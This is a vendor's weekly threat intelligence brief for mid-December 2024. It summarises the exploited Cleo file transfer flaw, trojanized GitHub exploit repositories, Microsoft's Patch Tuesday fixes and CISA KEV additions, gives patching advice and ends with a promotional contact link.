Threat Intel Brief for December 9 - December 15, 2024

Written by CoreTek | Dec 20, 2024 5:44:18 PM

In this weekly Threat Intelligence Brief we look back at top stories and security related callouts to provide relevant and actionable insights for the information security consumer.

We reference threat intelligence gained through our position as a security provider as well as industry sources in the development of this brief.

In this edition:
Cleo file transfer software vulnerability
Trojanized GitHub projects
Microsoft December 2024 Patch Tuesday
CISA KEV updates

Cleo file transfer software vulnerability

A critical vulnerability in Cleo's Harmony, VLTrader, and LexiCom file transfer software has been observed to be exploited in recent ransomware attacks, according to threat researchers at Huntress. CVE-2024-55956 allows an unauthenticated user to import and execute Bash or Powershell commands on the host system via the Autorun directory. The Cl0p ransomware gang has taken credit for successful widespread exploitation of the vulnerability, the gang is most notable for heavy involvement in the 2023 MOVEit data breach.

Some confusion on the vulnerability exists due to a previous designation (CVE-2024-50623) that was patched with version 5.8.0.21. But, this version was found to still be vulnerable, and additional fixes were released a few days later. According to Cleo's security advisory, the following product versions are affected:

Cleo Harmony® (prior to version 5.8.0.24)
Cleo VLTrader® (prior to version 5.8.0.24)
Cleo LexiCom® (prior to version 5.8.0.24)

The recommendation is to upgrade to version 5.8.0.24 ASAP. Huntress has compiled a list of known IoCs and tradecrafts used in some of the observed activity, please reference the linked source material for more in-depth information.

Source: Cleo Huntress

Trojanized GitHub projects

An emerging threat actor known as MUT-1244 was profiled in a recent report from Datadog Security Labs. The report details the threat actors use of both phishing and trojanized GitHub repositories to gain initial access to victim environments. The following attack flow graphic provided by Datadog gives some additional high-level context:


Many of the GitHub repos posed as working exploit PoC code aimed at fooling red teamers, penetration testers, security researchers, and even malicious actors. Speaking to the success of this tactic, the report states "Over 390,000 credentials, believed to be WordPress accounts, have been exfiltrated to the threat actor through the malicious code in trojanized "yawpp" GitHub project". The lesson here is to always be wary of unverified GitHub projects.

Source: Datadog Thehackernews

Microsoft December 2024 Patch Tuesday

74 total vulnerabilities fixed, including 16 rated as critical severity. Affected products include Microsoft Defender for Endpoint, Windows Hyper- V, Windows Cloud Files Mini Filter Driver, Windows Remote Desktop, Windows Message Queuing, Windows Mobile Broadband, Windows Kernel- Mode Drivers, and more.

1 actively exploited zero-day vulnerability patched, including:

CVE-2024-49138: Windows Common Log File System Elevation of Privilege Vulnerability - CVSS 7.8

Official Microsoft release notes with links to all the individual CVEs can be found here: https://msrc.microsoft.com/update-guide/releaseNote/2024- Dec

Source: Microsoft Qualys

CISA KEV updates

CISA has added 2 new CVEs to their Known Exploited Vulnerability (KEV) catalog this week: 

Don't know where to begin with vulnerability management?

Using CISAs KEV catalog as a risk-based approach can be a great way to help prioritize vulnerability remediation in your organization. This link provides guidance on how to implement the KEV CISA.

Source: Known Exploited Vulnerabilities Catalog | CISA

Coretek's managed SOC/SIEM customers benefit from the latest threat intelligence. If you're interested in learning more about what Coretek can offer your organization, please reach out: https://coretek.com/contact